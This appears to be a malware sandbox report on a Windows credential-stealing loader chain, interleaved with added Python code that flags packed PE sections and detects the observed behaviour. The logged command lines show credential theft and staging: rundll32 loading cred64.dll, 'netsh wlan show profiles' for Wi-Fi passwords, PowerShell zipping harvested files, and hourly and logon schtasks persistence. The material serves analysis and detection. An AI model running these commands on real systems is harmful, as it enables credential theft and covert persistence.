Source: RageMP131.exe.20.dr Static PE information: Section: ZLIB complexity 0.9915700285291631
Source: MPGPH131.exe.20.dr Static PE information: Section: ZLIB complexity 0.9915700285291631
Source: amert.exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: chrosha.exe.14.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: amert[1].exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
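Three of the static findings above come straight from the PE section table: section names that print as nothing (non-printable bytes, the "section with special chars" signature), a randomly named section such as fbupybke, and ZLIB complexity above 0.99 for the sections that hold the packed payload. The Python below is an added example, not tooling from the report, that reads the section table with the standard library only, applies those checks plus a writable-and-executable flag (a static hint of a self-unpacking stub), and scans for the "This is a third-party compiled AutoIt script." marker seen in 831840b410.exe. ZLIB complexity is computed as compressed size over raw size; that this is how the report derives its figure is an assumption. The fixture is a parse-only PE32 built in memory, not a real sample; the entrypoint arithmetic-ratio check needs a disassembler and is not reproduced.

```python
import hashlib
import struct
import zlib

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
AUTOIT_MARKER = b"This is a third-party compiled AutoIt script."


def parse_sections(data):
    """Walk the COFF section table of a PE image; returns one dict per section."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    n_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    table = pe_off + 24 + opt_size
    sections = []
    for i in range(n_sections):
        off = table + i * 40
        name = data[off:off + 8]
        vsize, _va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from("<IIIIIIHHI", data, off + 8)
        sections.append({"name": name, "virtual_size": vsize, "raw_size": raw_size,
                         "characteristics": chars, "raw": data[raw_ptr:raw_ptr + raw_size]})
    return sections


def name_has_special_chars(name):
    """True when the 8-byte name is empty or holds bytes outside printable ASCII once the
    NUL padding is stripped (what the report prints as a bare 'section name:')."""
    stripped = name.rstrip(b"\0")
    return not stripped or any(b < 0x20 or b > 0x7E for b in stripped)


def zlib_complexity(raw):
    """Compressed size over raw size (assumed definition of the report's metric); values
    near 1.0 mean the bytes do not compress, i.e. they are already packed or encrypted."""
    return len(zlib.compress(raw, 9)) / len(raw) if raw else 0.0


def assess(data, packed_threshold=0.98):
    findings = []
    for s in parse_sections(data):
        label = s["name"].rstrip(b"\0").decode("ascii", "backslashreplace") or "<empty>"
        if name_has_special_chars(s["name"]):
            findings.append(f"section {label!r}: name contains special chars")
        ratio = zlib_complexity(s["raw"])
        if ratio >= packed_threshold:
            findings.append(f"section {label!r}: ZLIB complexity {ratio:.3f}, likely packed or encrypted")
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {label!r}: writable and executable (self-modifying or unpacking stub)")
    if AUTOIT_MARKER in data:
        findings.append("compiled AutoIt script marker present")
    return findings


# ---- constructed fixture: a parse-only PE32, not a loadable binary ----
def deterministic_noise(n, seed=b"fixture"):
    """Incompressible but reproducible filler standing in for a packed section."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def build_pe(sections):
    """Assemble DOS stub + PE header + section table + raw data from (name, raw, characteristics)."""
    pe_off, opt_size, n = 0x40, 0xE0, len(sections)
    raw_ptr = (pe_off + 4 + 20 + opt_size + 40 * n + 0x1FF) & ~0x1FF  # 512-byte file alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x0102)  # EXECUTABLE_IMAGE|32BIT_MACHINE
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)              # PE32 magic, rest zeroed
    table, body = b"", b""
    for name, raw, chars in sections:
        table += name.ljust(8, b"\0")[:8] + struct.pack(
            "<IIIIIIHHI", len(raw), 0x1000, len(raw), raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += raw
    img = dos + b"PE\0\0" + coff + opt + table
    return img + b"\0" * (raw_ptr - len(img)) + body


def build_sample():
    return build_pe([
        (b"\x01\x07\x1b", deterministic_noise(4096), 0xE0000020),          # unprintable name, packed, RWX
        (b".idata", b"\0" * 512, 0xC0000040),                             # empty import area, compresses well
        (b".rdata", (AUTOIT_MARKER + b"\0").ljust(512, b"\0"), 0x40000040),
    ])


if __name__ == "__main__":
    for finding in assess(build_sample()):
        print(finding)
```

Run against a real dropped file, replace build_sample() with the file's bytes; the report's own values (0.9976 for the unnamed section of the submitted sample, 0.9945 for fbupybke in amert.exe) are what a packed section looks like under this ratio, while an ordinary .idata or .rdata section lands well below 0.5.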
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@106/196@19/15
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\SyncRootManager
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5596
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4012
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3436
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
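The behaviour recorded in this part of the report is the kind that converts directly into host detections: explorha.exe launching rundll32 on cred64.dll,Main from a directory under %APPDATA%, that rundll32 spawning a second rundll32 which in turn runs "netsh wlan show profiles" (the Sigma "Capture Wi-Fi password" hit), .job files written to C:\Windows\Tasks by the sample and by amert.exe, and build12.exe querying Win32_Processor over WMI. The Python below is an added example, not part of the report, that runs four such rules over an event stream constructed from these entries. PIDs are invented, the flat (kind, pid, ppid, image, cmdline, detail) record is a simplified Sysmon-style layout chosen for the example, and the svchost.exe FontCache write is included as a benign control that no rule should fire on.

```python
import ntpath
import re
from collections import namedtuple

# kind is "process" (cmdline set), "file" (detail = path written) or "wmi" (detail = query text).
Event = namedtuple("Event", "kind pid ppid image cmdline detail")

# Constructed event stream modelled on the report's process-creation, file-creation and
# WMI entries. PIDs are invented; the paths and command lines are the report's.
SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe"
EXPLORHA = r"C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
AMERT = r"C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
BUILD12 = r"C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"
RUNDLL_CMD = r'"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main'
EVENTS = [
    Event("process", 100, 1, SAMPLE, f'"{SAMPLE}"', None),
    Event("file", 100, 1, SAMPLE, None, r"C:\Windows\Tasks\explorha.job"),
    Event("process", 200, 100, EXPLORHA, f'"{EXPLORHA}"', None),
    Event("process", 201, 200, AMERT, f'"{AMERT}"', None),
    Event("file", 201, 200, AMERT, None, r"C:\Windows\Tasks\chrosha.job"),
    Event("process", 300, 200, r"C:\Windows\SysWOW64\rundll32.exe", RUNDLL_CMD, None),
    Event("process", 301, 300, r"C:\Windows\System32\rundll32.exe", RUNDLL_CMD, None),
    Event("process", 302, 301, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles", None),
    Event("wmi", 400, 200, BUILD12, None, "SELECT * FROM Win32_Processor"),
    Event("wmi", 400, 200, BUILD12, None, "SELECT * FROM Win32_Process Where SessionId='1'"),
    Event("process", 500, 1, SVCHOST, "svchost.exe", None),  # benign control
    Event("file", 500, 1, SVCHOST, None,
          r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp"),
]

USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
SYSTEM_DIR = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.I)
DLL_ARG = re.compile(r'\s([a-z]:\\[^,\s"]+\.dll)', re.I)
TASK_JOB = re.compile(r"^c:\\windows\\tasks\\[^\\]+\.job$", re.I)
WMI_CLASS = re.compile(r"\bfrom\s+(win32_\w+)", re.I)
# hardware classes this report shows being queried; Win32_Process enumeration is left alone
FINGERPRINT_CLASSES = {"win32_processor", "win32_videocontroller", "win32_diskdrive"}


def rule_rundll32_user_dll(ev):
    """rundll32 told to load a DLL from a user-writable path (cred64.dll,Main under %APPDATA% here)."""
    if ev.kind != "process" or not ev.image.lower().endswith("\\rundll32.exe"):
        return None
    m = DLL_ARG.search(ev.cmdline)
    if m and USER_WRITABLE.search(m.group(1)):
        return "rundll32 loading DLL from user-writable path: " + m.group(1)
    return None


def rule_task_job_drop(ev):
    """A .job written under the Windows Tasks directory by something that is not a system binary."""
    if ev.kind == "file" and TASK_JOB.match(ev.detail) and not SYSTEM_DIR.match(ev.image):
        return "scheduled-task persistence: " + ev.detail
    return None


def rule_wmi_fingerprint(ev):
    m = WMI_CLASS.search(ev.detail) if ev.kind == "wmi" else None
    if m and m.group(1).lower() in FINGERPRINT_CLASSES:
        return "WMI hardware fingerprinting query: " + m.group(1)
    return None


def rule_wifi_profile_dump(ev, parents):
    """'netsh wlan show profiles' reported together with the chain that spawned it."""
    if ev.kind != "process" or not ev.image.lower().endswith("\\netsh.exe"):
        return None
    if re.search(r"\bwlan\s+show\s+profiles?\b", ev.cmdline, re.I):
        chain = " <- ".join(ntpath.basename(p.image) for p in parents)
        return "Wi-Fi profile enumeration via netsh, spawned by: " + chain
    return None


def ancestry(ev, events):
    """Parent chain (nearest first) resolved over the process-creation events; loop-safe."""
    by_pid = {e.pid: e for e in events if e.kind == "process"}
    chain, pid, seen = [], ev.ppid, set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def run_rules(events):
    hits = []
    for ev in events:
        for rule in (rule_rundll32_user_dll, rule_task_job_drop, rule_wmi_fingerprint):
            msg = rule(ev)
            if msg:
                hits.append((ev.pid, msg))
        msg = rule_wifi_profile_dump(ev, ancestry(ev, events))
        if msg:
            hits.append((ev.pid, msg))
    return hits


if __name__ == "__main__":
    for pid, msg in run_rules(EVENTS):
        print(pid, msg)
```

The netsh hit carries the full ancestry (rundll32.exe <- rundll32.exe <- explorha.exe <- the submitted sample), which is what separates this from an administrator typing the same command. One further correlation this report offers but the rules above do not encode: the Roaming directory a091ec0a6e2227 that holds cred64.dll is the first 14 hex characters of the mutex explorha.exe creates (a091ec0a6e22276a96a99c1d34ef679c); a single sample does not establish that as a general pattern, so it is left as something to check by hand.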
Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F0A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3053135954.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029531974.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3026186524.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3035311559.00000000079E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Virustotal: Detection: 54%
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: amert.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 2052
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1948
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process created: C:\Windows\System32\conhost.exe
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
